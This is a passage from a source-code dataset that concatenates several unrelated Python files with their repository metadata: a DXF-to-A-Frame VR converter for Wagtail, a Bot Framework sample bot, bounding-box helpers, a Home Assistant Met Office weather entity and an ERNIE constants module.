output[x] = self.make_light(x, temp)
elif temp['2'] == 'a-text':
output[x] = self.make_text(x, temp)
elif temp['2'] == 'a-link':
output[x] = self.make_link(x, temp)
flag = False
if value == '3DFACE':#start 3D face
temp = {}#default values
flag = 'face'
x += 1
elif value == 'INSERT':#start block
temp = {'41': 1, '42': 1, '43': 1, '50': 0, '210': 0, '220': 0, '230': 1,'repeat': False}#default values
flag = 'block'
x += 1
dxf_f.close()
return output
def is_repeat(self, repeat, rx, ry):
if repeat:
output = f'; repeat:{rx} {ry}'
return output
else:
return ';'
def make_box(self, x, temp):
outstr = f'<a-entity id="box-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-box id="box-{x}" \n'
outstr += f'position="{float(temp["41"])/2} {float(temp["43"])/2} {-float(temp["42"])/2}" \n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}" \n'
outstr += 'geometry="'
try:
if temp['segments-depth']!='1':
outstr += f'segments-depth: {temp["segments-depth"]};'
if temp['segments-height']!='1':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-width']!='1':
outstr += f'segments-width: {temp["segments-width"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-box>\n</a-entity>\n'
return outstr
def make_cone(self, x, temp):
outstr = f'<a-entity id="cone-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-cone id="cone-{x}" \n'
outstr += f'position="0 {float(temp["43"])/2} 0" \n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}" \n'
outstr += 'geometry="'
try:
if temp['open-ended']!='false':
outstr += 'open-ended: true;'
if temp['radius-top']!='0':
outstr += f'radius-top: {temp["radius-top"]};'
if temp['segments-height']!='18':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-radial']!='36':
outstr += f'segments-radial: {temp["segments-radial"]};'
if temp['theta-length']!='360':
outstr += f'theta-length: {temp["theta-length"]};'
if temp['theta-start']!='0':
outstr += f'theta-start: {temp["theta-start"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-cone>\n</a-entity>\n'
return outstr
def make_circle(self, x, temp):
outstr = f'<a-entity id="circle-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-circle id="circle-{x}" \n'
if temp['2'] == 'circle':
outstr += f'rotation="-90 0 0"\n'
outstr += f'radius="{temp["41"]}" \n'
outstr += 'geometry="'
try:
if temp['segments']!='32':
outstr += f'segments: {temp["segments"]};'
if temp['theta-length']!='360':
outstr += f'theta-length: {temp["theta-length"]};'
if temp['theta-start']!='0':
outstr += f'theta-start: {temp["theta-start"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-circle>\n</a-entity>\n'
return outstr
def make_cylinder(self, x, temp):
outstr = f'<a-entity id="cylinder-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-cylinder id="cylinder-{x}" \n'
outstr += f'position="0 {float(temp["43"])/2} 0" \n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}" \n'
outstr += 'geometry="'
try:
if temp['open-ended']!='false':
outstr += 'open-ended: true;'
if temp['radius-top']!='0':
outstr += f'radius-top: {temp["radius-top"]};'
if temp['segments-height']!='18':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-radial']!='36':
outstr += f'segments-radial: {temp["segments-radial"]};'
if temp['theta-length']!='360':
outstr += f'theta-length: {temp["theta-length"]};'
if temp['theta-start']!='0':
outstr += f'theta-start: {temp["theta-start"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-cylinder>\n</a-entity>\n'
return outstr
def make_sphere(self, x, temp):
outstr = f'<a-entity id="sphere-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-sphere id="sphere-{x}" \n'
outstr += f'position="0 {temp["43"]} 0" \n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}" \n'
outstr += 'geometry="'
try:
if temp['phi-length']!='360':
outstr += f'phi-length: {temp["phi-length"]};'
if temp['phi-start']!='0':
outstr += f'phi-start: {temp["phi-start"]};'
if temp['segments-height']!='18':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-width']!='36':
outstr += f'segments-width: {temp["segments-width"]};'
if temp['theta-length']!='180':
outstr += f'theta-length: {temp["theta-length"]};'
if temp['theta-start']!='0':
outstr += f'theta-start: {temp["theta-start"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-sphere>\n</a-entity>\n'
return outstr
def make_plane(self, x, temp):
outstr = f'<a-entity id="plane-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-plane id="plane-{x}" \n'
if temp['2'] == 'look-at':#if it's a look at, it is centered and looks at the camera foot
outstr += f'position="0 {float(temp["43"])/2} 0" \n'
outstr += 'look-at="#camera-foot" \n'
elif temp['2'] == 'ceiling':#if it's a ceiling, correct position
outstr += f'position="{float(temp["41"])/2} {-float(temp["43"])/2} 0" \n'
else:#insertion is at corner
outstr += f'position="{float(temp["41"])/2} {float(temp["43"])/2} 0" \n'
outstr += f'width="{temp["41"]}" height="{temp["43"]}" \n'
outstr += 'geometry="'
try:
if temp['segments-height']!='1':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-width']!='1':
outstr += f'segments-width: {temp["segments-width"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-plane>\n</a-entity>\n'
return outstr
def make_text(self, x, temp):
outstr = f'<a-entity id="text-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}"\n'
outstr += f'text="width: {temp["41"]}; align: {temp["align"]}; color: {temp["color"]}; '
outstr += f'value: {temp["text"]}; wrap-count: {temp["wrap-count"]}; '
outstr += '">\n</a-entity>\n'
return outstr
def make_link(self, x, temp):
outstr = f'<a-link id="link-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}"\n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}"\n'
if temp['tree'] == 'parent':
target = self.get_parent()
elif temp['tree'] == 'child':
target = self.get_first_child()
elif temp['tree'] == 'previous' or temp['tree'] == 'prev':
target = self.get_prev_sibling()
else:#we default to next sibling
target = self.get_next_sibling()
if target:
outstr += f'href="{target.url}"\n'
outstr += f'title="{temp["title"]}" color="{temp["color"]}" on="click"\n'
eq_image = target.specific.equirectangular_image
if eq_image:
outstr += f'image="{eq_image.file.url}"'
else:
outstr += 'image="#default-sky"'
outstr += '>\n</a-link>\n'
return outstr
else:
return ''
def make_triangle_1(self, x, temp):
outstr = f'<a-triangle id="triangle-{x}" \n'
outstr += f'geometry="vertexA:{temp["10"]} {temp["30"]} {temp["20"]}; \n'
outstr += f'vertexB:{temp["11"]} {temp["31"]} {temp["21"]}; \n'
outstr += f'vertexC:{temp["12"]} {temp["32"]} {temp["22"]}" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}; '
if self.double_face:
outstr += 'side: double; '
outstr += '">\n</a-triangle> \n'
return outstr
def make_triangle_2(self, x, temp):
outstr = f'<a-triangle id="triangle-{x}" \n'
outstr += f'geometry="vertexA:{temp["10"]} {temp["30"]} {temp["20"]}; \n'
outstr += f'vertexB:{temp["12"]} {temp["32"]} {temp["22"]}; \n'
outstr += f'vertexC:{temp["13"]} {temp["33"]} {temp["23"]}" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}; '
if self.double_face:
outstr += 'side: double; '
outstr += '">\n</a-triangle> \n'
return outstr
def make_light(self, x, temp):
outstr = f'<a-entity id="light-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}"\n'
try:
if temp['type'] == 'ambient':
outstr += f'light="type: ambient; color: {temp["color"]}; intensity: {temp["intensity"]}; '
outstr += '">\n</a-entity>\n'#close light entity
elif temp['type'] == 'point':
outstr += f'light="type: point; color: {temp["color"]}; intensity: {temp["intensity"]}; '
outstr += f'decay: {temp["decay"]}; distance: {temp["distance"]}; '
if self.shadows:
outstr += 'castShadow: true; '
outstr += '"> \n</a-entity>\n'#close light entity
elif temp['type'] == 'spot':
outstr += f'light="type: spot; color: {temp["color"]}; intensity: {temp["intensity"]}; '
outstr += f'decay: {temp["decay"]}; distance: {temp["distance"]}; '
outstr += f'angle: {temp["angle"]}; penumbra: {temp["penumbra"]}; '
if self.shadows:
outstr += 'castShadow: true; '
outstr += f'target: #light-{x}-target;"> \n'
outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n</a-entity> \n'#close light entity
else:#defaults to directional
outstr += f'light="type: directional; color: {temp["color"]}; intensity: {temp["intensity"]}; '
if self.shadows:
outstr += 'castShadow: true; '
outstr += f'target: #light-{x}-target;"> \n'
outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n</a-entity> \n'#close light entity
except KeyError:#default if no light type is set
outstr += 'light="type: point; intensity: 0.75; distance: 50; decay: 2; '
if self.shadows:
outstr += 'castShadow: true;'
outstr += '">\n</a-entity>\n'#close light entity
return outstr
class Dxf2VrPageMaterialImage(Orderable):
page = ParentalKey(Dxf2VrPage, related_name='material_images')
image = models.ForeignKey(
'wagtailimages.Image',
null=True,
blank=True,
on_delete = models.SET_NULL,
related_name = '+',
)
layer = models.CharField(max_length=250, default="0",)
color = models.CharField(max_length=250, default="white",)
pattern = models.BooleanField(default=False)
panels = [
FieldPanel('layer'),
ImageChooserPanel('image'),
FieldPanel('pattern'),
FieldPanel('color'),
] | 46.499062 | 134 | 0.474863 | 24,196 | 0.976275 | 0 | 0 | 0 | 0 | 0 | 0 | 9,027 | 0.364227 |
350cec8c27b5dd37429a101a908ea432ca1e45e2 | 1,308 | py | Python | scenarios/activity-update-and-delete/bots/activity_update_and_delete_bot.py | Shiftersky/botbuilder-python | e00ea990d5cb5b05d545d87c51249dfa8f183581 | [
"MIT"
] | 1 | 2020-02-19T15:50:10.000Z | 2020-02-19T15:50:10.000Z | scenarios/activity-update-and-delete/bots/activity_update_and_delete_bot.py | Fortune-Adekogbe/botbuilder-python | 4e48c874c32a2a7fe7f27a7a1f825e2aa39466c4 | [
"MIT"
] | null | null | null | scenarios/activity-update-and-delete/bots/activity_update_and_delete_bot.py | Fortune-Adekogbe/botbuilder-python | 4e48c874c32a2a7fe7f27a7a1f825e2aa39466c4 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from botbuilder.core import MessageFactory, TurnContext, ActivityHandler
class ActivitiyUpdateAndDeleteBot(ActivityHandler):
def __init__(self, activity_ids):
self.activity_ids = activity_ids
async def on_message_activity(self, turn_context: TurnContext):
TurnContext.remove_recipient_mention(turn_context.activity)
if turn_context.activity.text == "delete":
for activity in self.activity_ids:
await turn_context.delete_activity(activity)
self.activity_ids = []
else:
await self._send_message_and_log_activity_id(
turn_context, turn_context.activity.text
)
for activity_id in self.activity_ids:
new_activity = MessageFactory.text(turn_context.activity.text)
new_activity.id = activity_id
await turn_context.update_activity(new_activity)
async def _send_message_and_log_activity_id(
self, turn_context: TurnContext, text: str
):
reply_activity = MessageFactory.text(text)
resource_response = await turn_context.send_activity(reply_activity)
self.activity_ids.append(resource_response.id)
| 38.470588 | 78 | 0.699541 | 1,137 | 0.869266 | 0 | 0 | 0 | 0 | 995 | 0.760703 | 100 | 0.076453 |
350ee2dd3bf8139a0a27fa5260ff00d59d16fd74 | 90 | py | Python | deliravision/torch/models/gans/deep_convolutional/__init__.py | delira-dev/vision_torch | d944aa67d319bd63a2add5cb89e8308413943de6 | [
"BSD-2-Clause"
] | 4 | 2019-08-03T09:56:50.000Z | 2019-09-05T09:32:06.000Z | deliravision/torch/models/gans/deep_convolutional/__init__.py | delira-dev/vision_torch | d944aa67d319bd63a2add5cb89e8308413943de6 | [
"BSD-2-Clause"
] | 23 | 2019-08-03T14:16:47.000Z | 2019-10-22T10:15:10.000Z | deliravision/torch/models/gans/deep_convolutional/__init__.py | delira-dev/vision_torch | d944aa67d319bd63a2add5cb89e8308413943de6 | [
"BSD-2-Clause"
] | null | null | null | from deliravision.models.gans.deep_convolutional.dc_gan import \
DeepConvolutionalGAN
| 30 | 64 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
350f3983aa26583c3a316ae8d7d678366a0569bd | 3,526 | py | Python | nobos_commons/utils/bounding_box_helper.py | noboevbo/nobos_commons | 471e52e10fd2228c106777c72d8439e58b047003 | [
"MIT"
] | 2 | 2020-06-03T16:28:44.000Z | 2020-10-10T03:07:23.000Z | nobos_commons/utils/bounding_box_helper.py | noboevbo/nobos_commons | 471e52e10fd2228c106777c72d8439e58b047003 | [
"MIT"
] | null | null | null | nobos_commons/utils/bounding_box_helper.py | noboevbo/nobos_commons | 471e52e10fd2228c106777c72d8439e58b047003 | [
"MIT"
] | 4 | 2020-10-10T03:07:25.000Z | 2021-09-30T01:11:02.000Z | import random
import sys
from nobos_commons.data_structures.bounding_box import BoundingBox
from nobos_commons.data_structures.bounding_box_3D import BoundingBox3D
from nobos_commons.data_structures.dimension import Coord2D, Coord3D
from nobos_commons.data_structures.skeletons.joint_2d import Joint2D
from nobos_commons.data_structures.skeletons.joint_3d import Joint3D
from nobos_commons.data_structures.skeletons.skeleton_joints_base import SkeletonJointsBase
def get_human_bounding_box_from_joints(joints: SkeletonJointsBase[Joint2D], max_x_val: int = sys.maxsize,
max_y_val: int = sys.maxsize):
min_x = sys.maxsize
min_y = sys.maxsize
max_x = 0
max_y = 0
for joint in joints:
x = joint.x
y = joint.y
min_x = min_x if x > min_x else x
min_y = min_y if y > min_y else y
max_x = max_x if x < max_x else x
max_y = max_y if y < max_y else y
bb_width = max_x - min_x
bb_height = max_y - min_y
bb_expand_width = 0.15 * bb_width
bb_expand_height = 0.15 * bb_height
min_x = min_x - bb_expand_width
min_y = min_y - bb_expand_height
max_x = max_x + bb_expand_width
max_y = max_y + bb_expand_height
min_x = min_x if min_x > 0 else 0
min_y = min_y if min_y > 0 else 0
max_x = max_x if max_x < max_x_val else max_x_val
max_y = max_y if max_y < max_y_val else max_y_val
return BoundingBox(top_left=Coord2D(x=int(min_x), y=int(min_y)),
bottom_right=Coord2D(x=int(max_x), y=int(max_y)), label="person")
def get_human_bounding_box_3D_from_joints(joints: SkeletonJointsBase[Joint3D], max_x_val: int = sys.maxsize,
max_y_val: int = sys.maxsize,
max_z_val: int = sys.maxsize):
min_x = sys.maxsize
min_y = sys.maxsize
min_z = sys.maxsize
max_x = 0
max_y = 0
max_z = 0
for joint in joints:
x = joint.x
y = joint.y
z = joint.z
min_x = min_x if x > min_x else x
min_y = min_y if y > min_y else y
min_z = min_z if z > min_z else z
max_x = max_x if x < max_x else x
max_y = max_y if y < max_y else y
max_z = max_z if z < max_z else z
bb_width = max_x - min_x
bb_height = max_y - min_y
bb_depth = max_z - min_z
bb_expand_width = 0.15 * bb_width
bb_expand_height = 0.15 * bb_height
bb_expand_depth = 0.15 * bb_depth
min_x = min_x - bb_expand_width
min_y = min_y - bb_expand_height
min_z = min_z - bb_expand_depth
max_x = max_x + bb_expand_width
max_y = max_y + bb_expand_height
max_z = max_z + bb_expand_depth
min_x = min_x if min_x > 0 else 0
min_y = min_y if min_y > 0 else 0
min_z = min_z if min_z > 0 else 0
max_x = max_x if max_x < max_x_val else max_x_val
max_y = max_y if max_y < max_y_val else max_y_val
max_z = max_z if max_z < max_z_val else max_z_val
return BoundingBox3D(top_left=Coord3D(x=min_x, y=min_y, z=min_z),
bottom_right=Coord3D(x=max_x, y=max_y, z=max_z), label="person")
def get_random_bounding_box(width, height, bb_min_size=(5, 5)):
x = random.randrange(0, width - bb_min_size[0])
y = random.randrange(0, height - bb_min_size[1])
x_max = random.randrange(x + bb_min_size[0], width)
y_max = random.randrange(y + bb_min_size[1], height)
return BoundingBox(top_left=Coord2D(x=x, y=y), bottom_right=Coord2D(x=x_max, y=y_max))
| 35.979592 | 108 | 0.657969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 16 | 0.004538 |
351065226af5d5b96c95ebd5533ca34ea88bb7fd | 4,556 | py | Python | homeassistant/components/metoffice/weather.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 6 | 2017-08-02T19:26:39.000Z | 2020-03-14T22:47:41.000Z | homeassistant/components/metoffice/weather.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 60 | 2020-08-03T07:32:56.000Z | 2022-03-31T06:02:07.000Z | homeassistant/components/metoffice/weather.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 14 | 2018-08-19T16:28:26.000Z | 2021-09-02T18:26:53.000Z | """Support for UK Met Office weather service."""
from homeassistant.components.weather import WeatherEntity
from homeassistant.const import LENGTH_KILOMETERS, TEMP_CELSIUS
from homeassistant.core import callback
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
from .const import (
ATTRIBUTION,
CONDITION_CLASSES,
DEFAULT_NAME,
DOMAIN,
METOFFICE_COORDINATOR,
METOFFICE_DATA,
METOFFICE_NAME,
VISIBILITY_CLASSES,
VISIBILITY_DISTANCE_CLASSES,
)
async def async_setup_entry(
hass: HomeAssistantType, entry: ConfigType, async_add_entities
) -> None:
"""Set up the Met Office weather sensor platform."""
hass_data = hass.data[DOMAIN][entry.entry_id]
async_add_entities(
[
MetOfficeWeather(
entry.data,
hass_data,
)
],
False,
)
class MetOfficeWeather(WeatherEntity):
"""Implementation of a Met Office weather condition."""
def __init__(self, entry_data, hass_data):
"""Initialise the platform with a data instance."""
self._data = hass_data[METOFFICE_DATA]
self._coordinator = hass_data[METOFFICE_COORDINATOR]
self._name = f"{DEFAULT_NAME} {hass_data[METOFFICE_NAME]}"
self._unique_id = f"{self._data.latitude}_{self._data.longitude}"
self.metoffice_now = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unique_id(self):
"""Return the unique of the sensor."""
return self._unique_id
@property
def condition(self):
"""Return the current condition."""
return (
[
k
for k, v in CONDITION_CLASSES.items()
if self.metoffice_now.weather.value in v
][0]
if self.metoffice_now
else None
)
@property
def temperature(self):
"""Return the platform temperature."""
return (
self.metoffice_now.temperature.value
if self.metoffice_now and self.metoffice_now.temperature
else None
)
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_CELSIUS
@property
def visibility(self):
"""Return the platform visibility."""
_visibility = None
if hasattr(self.metoffice_now, "visibility"):
_visibility = f"{VISIBILITY_CLASSES.get(self.metoffice_now.visibility.value)} - {VISIBILITY_DISTANCE_CLASSES.get(self.metoffice_now.visibility.value)}"
return _visibility
@property
def visibility_unit(self):
"""Return the unit of measurement."""
return LENGTH_KILOMETERS
@property
def pressure(self):
"""Return the mean sea-level pressure."""
return (
self.metoffice_now.pressure.value
if self.metoffice_now and self.metoffice_now.pressure
else None
)
@property
def humidity(self):
"""Return the relative humidity."""
return (
self.metoffice_now.humidity.value
if self.metoffice_now and self.metoffice_now.humidity
else None
)
@property
def wind_speed(self):
"""Return the wind speed."""
return (
self.metoffice_now.wind_speed.value
if self.metoffice_now and self.metoffice_now.wind_speed
else None
)
@property
def wind_bearing(self):
"""Return the wind bearing."""
return (
self.metoffice_now.wind_direction.value
if self.metoffice_now and self.metoffice_now.wind_direction
else None
)
@property
def attribution(self):
"""Return the attribution."""
return ATTRIBUTION
async def async_added_to_hass(self) -> None:
"""Set up a listener and load data."""
self.async_on_remove(
self._coordinator.async_add_listener(self._update_callback)
)
self._update_callback()
@callback
def _update_callback(self) -> None:
"""Load data from integration."""
self.metoffice_now = self._data.now
self.async_write_ha_state()
@property
def should_poll(self) -> bool:
"""Entities do not individually poll."""
return False
@property
def available(self):
"""Return if state is available."""
return self.metoffice_now is not None
| 27.95092 | 163 | 0.620939 | 3,670 | 0.805531 | 0 | 0 | 2,848 | 0.62511 | 614 | 0.134767 | 1,014 | 0.222564 |
35113f1d050dde439e758f95376f877e2f9194b9 | 5,816 | py | Python | erniekit/common/rule.py | PaddlePaddle/LARK | 94a2367ba7f0f83b48330233450ea095d8dc9382 | [
"Apache-2.0"
] | 1,552 | 2019-03-03T19:52:07.000Z | 2019-07-19T06:47:57.000Z | erniekit/common/rule.py | PaddlePaddle/LARK | 94a2367ba7f0f83b48330233450ea095d8dc9382 | [
"Apache-2.0"
] | 154 | 2019-03-06T08:19:57.000Z | 2019-07-19T02:52:22.000Z | erniekit/common/rule.py | PaddlePaddle/LARK | 94a2367ba7f0f83b48330233450ea095d8dc9382 | [
"Apache-2.0"
] | 382 | 2019-03-04T13:37:01.000Z | 2019-07-19T06:33:44.000Z | # -*- coding: utf-8 -*
"""
some rule
"""
class MaxTruncation(object):
"""MaxTruncation:超长截断规则
"""
KEEP_HEAD = 0 # 从头开始到最大长度截断
KEEP_TAIL = 1 # 从头开始到max_len-1的位置截断,末尾补上最后一个id(词或字)
KEEP_BOTH_HEAD_TAIL = 2 # 保留头和尾两个位置,然后按keep_head方式截断
class EmbeddingType(object):
"""EmbeddingType:文本数据需要转换的embedding类型:no_emb , ernie_emb
"""
NONE_EMBEDDING = 0 # 不需要emb
ERNIE_EMBEDDING = 1 # 用ernie生成emb
FLUID_EMBEDDING = 2 # 使用fluid的op生成emb
class FluidDataType(object):
""" FluidDataType data struct wrapper """
def __init__(self, shape, dtype, lod_level, name=None):
self.shape = shape
self.dtype = dtype
self.lod_level = lod_level
self.name = name
class WordPieceType(object):
"""字词混合切分模式下,每个token的type"""
SINGLE_TOKEN = 0 # 单个字
WORD_START = 1 # 词首字符
WORD_INCLUDE = 2 # 词中间字符
class DataShape(object):
"""DataShape:输入的数据类型
"""
STRING = "string" # string
INT = "int" # int64
FLOAT = "float" # float32
class InstanceName(object):
"""InstanceName:一些常用的命名
"""
RECORD_ID = "id"
RECORD_EMB = "emb"
SRC_IDS = "src_ids"
WORDSEG_IDS = "wordseg_ids"
MASK_IDS = "mask_ids"
LOSS_MASK = "loss_mask"
SEQ_LENS = "seq_lens"
SENTENCE_IDS = "sent_ids"
POS_IDS = "pos_ids"
TASK_IDS = "task_ids"
PHONETIC_A_IDS = "phonetic_a_ids"
PHONETIC_B_IDS = "phonetic_b_ids"
GLYPH_A_IDS = "glyph_a_ids"
GLYPH_B_IDS = "glyph_b_ids"
GLYPH_C_IDS = "glyph_c_ids"
GLYPH_D_IDS = "glyph_d_ids"
REL_POS_IDS="rel_pos_ids"
DEEP_IDS = "deep_ids"
BEG_IDS = "beg_ids"
END_IDS = "end_ids"
#生成训练相关key
TGT_LABEL = "tgt_label"
TGT_POS = "tgt_pos"
#生成解码相关key
TGT_SRC_IDS = "tgt_src_ids"
TGT_POS_IDS = "tgt_pos_ids"
INIT_SCORES = "init_scores"
PARENT_IDX = "parent_idx"
TGT_MASK_IDS = 'tgt_mask_ids'
DATA_IDS = 'data_ids'
#多轮对话相关key
ROLE_IDS = "role_ids"
TURN_IDS = "turn_ids"
TGT_PHONETIC_A_IDS = "tgt_phonetic_a_ids"
TGT_PHONETIC_B_IDS = "tgt_phonetic_b_ids"
TGT_GLYPH_A_IDS = "tgt_glyph_a_ids"
TGT_GLYPH_B_IDS = "tgt_glyph_b_ids"
TGT_GLYPH_C_IDS = "tgt_glyph_c_ids"
TGT_GLYPH_D_IDS = "tgt_glyph_d_ids"
# seq2seq的label域相关key
TRAIN_LABEL_SRC_IDS = "train_label_src_ids"
TRAIN_LABEL_MASK_IDS = "train_label_mask_ids"
TRAIN_LABEL_SEQ_LENS = "train_label_seq_lens"
INFER_LABEL_SRC_IDS = "infer_label_src_ids"
INFER_LABEL_MASK_IDS = "infer_label_mask_ids"
INFER_LABEL_SEQ_LENS = "infer_label_seq_lens"
# term rank 相关的key
TERM_POS = "term_pos"
TERM_TOKENS_NUMS = "term_tokens_nums"
TERM_INDEX = "term_index"
TERM_PAIRS = "term_pairs"
TERM_DIFFS = "term_diffs"
SEQUENCE_EMB = "sequence_output" # 词级别的embedding
POOLED_EMB = "pooled_output" # 句子级别的embedding
TARGET_FEED = "target_feed" # 保存模型时需要的入参:表示模型预测时需要输入的变量,tensor 或者variable类型
TARGET_FEED_NAMES = "target_feed_name" # 保存模型时需要的入参:表示模型预测时需要输入的变量名称和顺序
TARGET_PREDICTS = "target_predicts" # 保存模型时需要的入参:表示预测时最终输出的结果
PREDICT_RESULT = "predict_result" # 训练过程中需要传递的预测结果
STUDENT_PREDICT_RESULT = "student_predict_result" # 训练过程中需要传递的预测结果
TEACHER_PREDICT_RESULT = "teacher_predict_result" # 训练过程中需要传递的预测结果
LABEL = "label" # label
TEACHER_CE_LOSS = "teacher_ce_loss"
STUDENT_CE_LOSS = "student_ce_loss"
DISTILL_LOSS = "distill_loss"
PRED_LOSS = "pred_loss"
LOSS = "loss" # loss
# CRF_EMISSION = "crf_emission" # crf_emission
TRAINING = "training" # 训练过程
EVALUATE = "evaluate" # 评估过程
TEST = "test" # 测试过程
SAVE_INFERENCE = "save_inference" # 保存inference model的过程
INFERENCE = "inference" # 预测过程
STEP = "steps"
SPEED = "speed"
TIME_COST = "time_cost"
GPU_ID = "gpu_id"
FILE_CHECKPOINTS = "checkpoints"
FILE_INFERENCE_MODEL = "inference_model"
TYPE_PY_READER = "py_reader"
TYPE_DATA_LOADER = "data_loader"
# ERNIE-VIL相关key
IMAGE_PIXEL_IDS = "image_pixel_ids"
IMAGE_POSITION = "image_position"
IMAGE_TAG_IDS = "image_tag_ids"
TEXT_INDEX = "text_index"
IMAGE_INDEX = "image_index"
POS_INDEX = "pos_index"
# ERNIE-Layout相关key
POS_2D_IDS = "pos_2d_ids"
SEGMENT_IDS = "segment_ids"
# DynaBERT相关key
HIDDEN_LAYERS = "hidden_layers"
LOGIT = "logit"
# prompt相关key
LABEL_MAP_IDS = "label_map_ids"
LABEL_TEXT_IDS = "label_text_ids"
BATCH_SIZE = "batch_size"
MAX_SEQ_LEN = "max_seq_len"
class FieldLength(object):
"""一个field在序列化成field_id_list的时候,占的长度是多少
"""
CUSTOM_TEXT_FIELD = 3
ERNIE_TEXT_FIELD = 6
SINGLE_SCALAR_FIELD = 1
ARRAY_SCALAR_FIELD = 2
BASIC_TEXT_FIELD = 2
GENERATE_LABEL_FIELD = 6
ERNIE_TERM_RANK_TEXT_FIELD = 9
ERNIT_TERM_RANK_LABEL_FIELD = 4
# ERNIE-VIL RELATED VARIABLES
ERNIEVIL_IMAGE_PIXEL_FIELD = 1
ERNIEVIL_IMAGE_TAGS_FIELD = 1
# ERNIE-Layout RELATED VARIABLES
ERNIE_LAYOUT_SEQLABEL_FIELD = 10
class FleetMode(object):
"""Fleet模式
"""
NO_FLEET = "NO_FLEET"
CPU_MODE = "CPU"
GPU_MODE = "GPU"
class UploadModelType(object):
"""模型上传的类型"""
UPLOAD_HDFS_IMMEDIATE = "immediate" # 实时上传到HDFS
UPLOAD_HDFS_LAST_TIME = "last_time" # 训练结束之后由paddlecloud平台进行集中上传
class StoreModelType(object):
"""模型保存方式的类型"""
STORE_HDFS = "hadoop" # 保存到hadoop集群上
STORE_IREPO = "irepo" # 保存到irepo模型仓库中
class EncryptType(object):
"""模型加密的方式"""
ENCRYPT_NONE = None # 不加密
ENCRYPT_MEMORY = "memory" # 内存加密
ENCRYPT_FILE = "file" # 文件加密
class InferenceRetcode(object):
""" 预测服务返回码 """
RET_OK = 200
LOAD_JSON_FAILED = 201
MISSING_FIELD = 202
class GraphMode(object):
"""图模式
"""
#动态图
DYGRAPH = "dynamic"
#静态图
STATIC = "static"
| 25.734513 | 80 | 0.678817 | 6,561 | 0.988102 | 0 | 0 | 0 | 0 | 0 | 0 | 3,238 | 0.487651 |
3513f46bb42fac991ca739cdee5e8eb27738239d | 8,511 | py | Python | bbscrape/__main__.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
